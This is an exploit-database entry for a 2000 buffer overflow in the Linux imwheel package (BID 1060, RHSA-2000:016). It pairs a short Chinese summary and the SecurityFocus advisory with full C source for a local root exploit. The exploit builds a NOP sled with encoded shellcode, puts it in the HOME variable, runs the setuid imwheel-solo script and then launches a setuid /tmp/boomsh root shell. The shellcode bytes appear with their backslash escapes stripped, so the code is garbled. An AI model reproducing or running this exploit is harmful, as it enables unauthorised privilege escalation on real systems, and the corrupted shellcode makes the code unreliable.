https://www.exploit-db.com/exploits/19812
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-026

imwheel中存在缓冲区溢出漏洞，本地用户可以通过imwheel-solo脚本和超长HOME环境变量获得根用户权限。

source: http://www.securityfocus.com/bid/1060/info
 
A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. 

/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL. 
 *** 
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>



/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
 */
char shell[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x58x80x36x01x46xe2xfa"
"xeax0dx2ex75x6cx71x2ex63x6ex6ex6cx72x69x01x80xed"
"x66x2ax01x01x54x88xe4x57x52xe9x01x01x01x01x5ax80xc2xabx11"
"x01x01x30xc8x8cxb2x3bxeexfexfexb9xb7x01x01x01x88xcbx52x88"
"xf2xccx81xb8xecx08x01x01xb9x0ex01x01x01x52x88xf2xccx81x30"
"xc1x5ax5fx88xedx5cxc2x91x91x91x91x91x91x91x91";


/* filename-buffer plus ret + ebp
 */
#define buflen (2048+8)

int main(int argc, char **argv)
{						       		
	char *im[] = {
		"/usr/X11R6/bin/imwheel-solo", 
		0
	};
	char *a[] = {
		"/tmp/boomsh",
		0
	};
	FILE *f;
	struct stat s;	
	char boom[buflen+10];
	int i = 0, j = 0, ret =  0xbfffee68;	/* this address works for me */

	if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
		perror("fopen");
		exit(errno);
	}
	printf("Creating boom-shell...n");
	fprintf(f, "int main() {char *a[]={"/bin/sh",0};nsetuid(0);nexecve(*a, a, 0);nreturn 0;}n");
	fclose(f);
	system("cc /tmp/boomsh.c -o /tmp/boomsh");

	printf("Creating shellcode...n");
    	memset(boom, 0, sizeof(boom));
	memset(boom, 0x90, buflen);
	if (argc > 1)
		ret += atoi(argv[1]);
	else
		printf("You can also add an offset to the commandline.n");
	for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
		boom[i] = shell[j++];
	*(long*)(&boom[i]) = ret; 
	
	printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxern"
	       "Respect other users privacy!n");
	
	setenv("HOME", boom, 1);
	setenv("DISPLAY", ":0", 1);
	
	printf("Invoking vulnerable program (imwheel-solo)...n");
	if (fork() == 0) {
		execl(im[0], im[0], im[1], im[2], 0);
	}
	sleep(4);
	
	memset(&s, 0, sizeof(s));
	stat("/tmp/boomsh", &s);
	if ((S_ISUID & s.st_mode) != S_ISUID) {
		printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.n");
		return -1;
	}
	/* Huh? :-)
	 */
	printf("Knocking on heavens door...n");
	execve(a[0], a, 0);
	return 0;
}

来源:BID
名称:1060
链接:http://www.securityfocus.com/bid/1060
来源:REDHAT
名称:RHSA-2000:016
链接:http://www.redhat.com/support/errata/RHSA-2000-016.html
来源:BUGTRAQ
名称:20000316TESO&C-Skillsdevelopmentadvisory–imwheel;
链接:http://archives.neohapsis.com/archives/bugtraq/2000-03/0168.html